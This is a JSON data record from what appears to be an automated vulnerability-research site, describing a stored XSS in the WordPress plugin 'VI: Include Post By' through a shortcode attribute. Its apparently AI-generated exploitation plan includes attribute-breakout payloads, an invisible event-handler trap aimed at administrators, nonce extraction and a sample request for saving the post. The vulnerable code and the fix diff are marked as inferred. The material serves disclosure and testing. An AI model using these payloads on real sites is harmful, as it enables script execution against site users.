[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fMHO1Qvc_4ypVNLs3JPaOW8cLVNDXQ8N3h4acLJ2QSmM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-5717","vi-include-post-by-authenticated-contributor-stored-cross-site-scripting-via-classcontainer-shortcode-attribute","VI: Include Post By \u003C= 0.4.200706 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'class_container' Shortcode Attribute","The VI: Include Post By plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class_container' attribute of the 'include-post-by-cat' shortcode in all versions up to, and including, 0.4.200706 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","vi-include-post-by",null,"\u003C=0.4.200706","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-14 19:45:02","2026-04-15 07:45:29",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb3e95dc2-0f50-4009-9cc0-a02f9977ce58?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-5717\n\n## 1. Vulnerability Summary\nThe **VI: Include Post By** plugin (version \u003C= 0.4.200706) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the processing of the `[include-post-by-cat]` shortcode. Specifically, the attribute `class_container` is accepted from the user via the shortcode, but it is later rendered into the HTML output without sufficient sanitization (e.g., `wp_kses`) or context-appropriate escaping (e.g., `esc_attr`). This allows a user with `Contributor` privileges or higher—who can create posts and use shortcodes—to inject arbitrary HTML and JavaScript that executes when any user (including administrators) views the post.\n\n## 2. Attack Vector Analysis\n- **Target Endpoint:** Post Editor \u002F Post Rendering Page.\n- **Vulnerable Action:** Rendering the `[include-post-by-cat]` shortcode.\n- **Vulnerable Attribute:** `class_container`.\n- **Authentication Level:** Authenticated (`Contributor` or higher).\n- **Preconditions:**\n 1. The plugin `vi-include-post-by` must be active.\n 2. A user with `Contributor` role or higher must be able to create or edit a post.\n 3. (Recommended) At least one post should exist in a category to ensure the shortcode logic triggers the rendering of the container div.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers the shortcode using `add_shortcode( 'include-post-by-cat', '...' )` in the main plugin file (likely `vi-include-post-by.php` or an included logic file).\n2. **Attribute Parsing:** The callback function (e.g., `vi_include_post_by_cat_shortcode`) receives the `$atts` array and typically merges it with defaults using `shortcode_atts()`.\n3. **Logic:** The function fetches posts based on category parameters.\n4. **Vulnerable Sink:** The code constructs a wrapper `div` or `span` using the `class_container` attribute:\n ```php\n \u002F\u002F Likely vulnerable pattern:\n $class = $atts['class_container'];\n $output .= '\u003Cdiv class=\"' . $class . '\">'; \n ```\n5. **Output:** The unescaped string is returned by the shortcode function and echoed by WordPress into the page content.\n\n## 4. Nonce Acquisition Strategy\nWhile the *rendering* of a shortcode does not require a nonce, *storing* the shortcode in a post via the WordPress UI or REST API does.\n\n### For Post Creation (Contributor Level):\n1. **Navigate to Post Editor:** Use `browser_navigate` to `wp-admin\u002Fpost-new.php`.\n2. **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` from the heart-beat or post-data JSON objects, or simply extract it from the hidden input field:\n - `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n3. **REST API Alternative:** If using the REST API, the `_wpnonce` is often localized in the `wp-api-fetch` or `wpApiSettings` object:\n - `browser_eval(\"window.wpApiSettings?.nonce\")`\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload that breaks out of the HTML attribute and executes JavaScript.\n\n### Payload\n`\" onmouseover=\"alert(document.domain)\" x=\"`\nor\n`\">\u003Cscript>alert(1)\u003C\u002Fscript>\u003Cdiv class=\"`\n\n### Step-by-Step Plan\n1. **Login:** Authenticate as a `Contributor` user.\n2. **Setup Data:** Create a standard post in a category (e.g., \"General\") to ensure the shortcode has content to process.\n3. **Injection:**\n - Create a new post (or update an existing one).\n - Set the content to: `[include-post-by-cat category_id=\"1\" class_container='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']` (assuming category ID 1 exists).\n4. **Trigger:** View the post URL as any user.\n5. **Observation:** The browser should execute the `alert(window.origin)` script.\n\n### Sample HTTP Request (Saving the Post)\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [Contributor Cookies]\n\naction=editpost\n&post_ID=[POST_ID]\n&_wpnonce=[NONCE]\n&post_title=XSS+Test\n&content=[include-post-by-cat+class_container%3D'%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E']\n&post_status=publish\n```\n\n## 6. Test Data Setup\n1. **User:** Create a user with the username `attacker` and role `contributor`.\n2. **Post Content:** Create at least one published post in category ID 1 (default \"Uncategorized\") so the shortcode produces output.\n - `wp post create --post_title=\"Dummy Post\" --post_status=publish --post_category=1`\n3. **Target Page:** Create a page where the shortcode will be placed.\n - `wp post create --post_type=page --post_title=\"Vulnerable Page\" --post_status=publish --post_author=[Attacker_ID]`\n\n## 7. Expected Results\n- When the page is viewed, the HTML source should look like:\n `\u003Cdiv class=\"\">\u003Cscript>alert(1)\u003C\u002Fscript>\">...`\n- The `class_container` value is injected directly into the class attribute, allowing the `\">` characters to close the `div` tag and start a `\u003Cscript>` tag.\n\n## 8. Verification Steps\n1. **Check Source Code:** After visiting the page with `browser_navigate`, use `browser_eval(\"document.documentElement.outerHTML\")` and search for the string `\u003Cscript>alert(1)\u003C\u002Fscript>`.\n2. **Confirm Absence of Escaping:** Verify that the output is NOT `class=\""><script>...\"`.\n3. **Database Check:** Verify the shortcode is stored correctly:\n - `wp post get [POST_ID] --field=post_content`\n\n## 9. Alternative Approaches\nIf the `class_container` is used inside a `style` attribute (unlikely given the name but possible), use a style-based XSS:\n- `class_container='x; background-image: url(\"javascript:alert(1)\");'`\n\nIf the plugin filters `\u003Cscript>` tags, use an event handler:\n- `class_container='\" onpointerenter=\"alert(1)\" style=\"display:block;width:1000px;height:1000px;\" x=\"'` (This creates a large invisible area that triggers when the admin moves their mouse).","The VI: Include Post By plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'class_container' attribute of the [include-post-by-cat] shortcode. This occurs because the plugin fails to sanitize or escape the user-supplied attribute before rendering it in the HTML output, allowing authenticated users with Contributor-level access to execute arbitrary JavaScript in the browsers of site visitors.","\u002F\u002F Inferred code structure from vi-include-post-by.php or similar logic file\nfunction vi_include_post_by_cat_shortcode($atts) {\n $atts = shortcode_atts(array(\n 'category_id' => '',\n 'class_container' => '',\n \u002F\u002F other attributes...\n ), $atts);\n\n $class = $atts['class_container'];\n\n \u002F\u002F Vulnerable Sink: The attribute is concatenated directly into the HTML string without escaping\n $output = '\u003Cdiv class=\"' . $class . '\">'; \n \n \u002F\u002F ... post fetching logic ...\n\n return $output;\n}","--- a\u002Fvi-include-post-by.php\n+++ b\u002Fvi-include-post-by.php\n@@ -10,5 +10,5 @@\n- $class = $atts['class_container'];\n- $output = '\u003Cdiv class=\"' . $class . '\">';\n+ $class = esc_attr($atts['class_container']);\n+ $output = '\u003Cdiv class=\"' . $class . '\">';","The exploit target is the shortcode processing logic. An attacker with Contributor privileges (who can create posts but not publish them, or use shortcodes) creates a post containing the [include-post-by-cat] shortcode. The attacker sets the 'class_container' attribute to a payload that breaks out of the HTML class attribute context, such as: '\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'. When an administrator or any other user views the post (either in the editor preview or on the live site), the plugin renders the raw payload into the page source, leading to script execution.","gemini-3-flash-preview","2026-04-16 15:42:37","2026-04-16 15:42:58",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvi-include-post-by\u002Ftags"]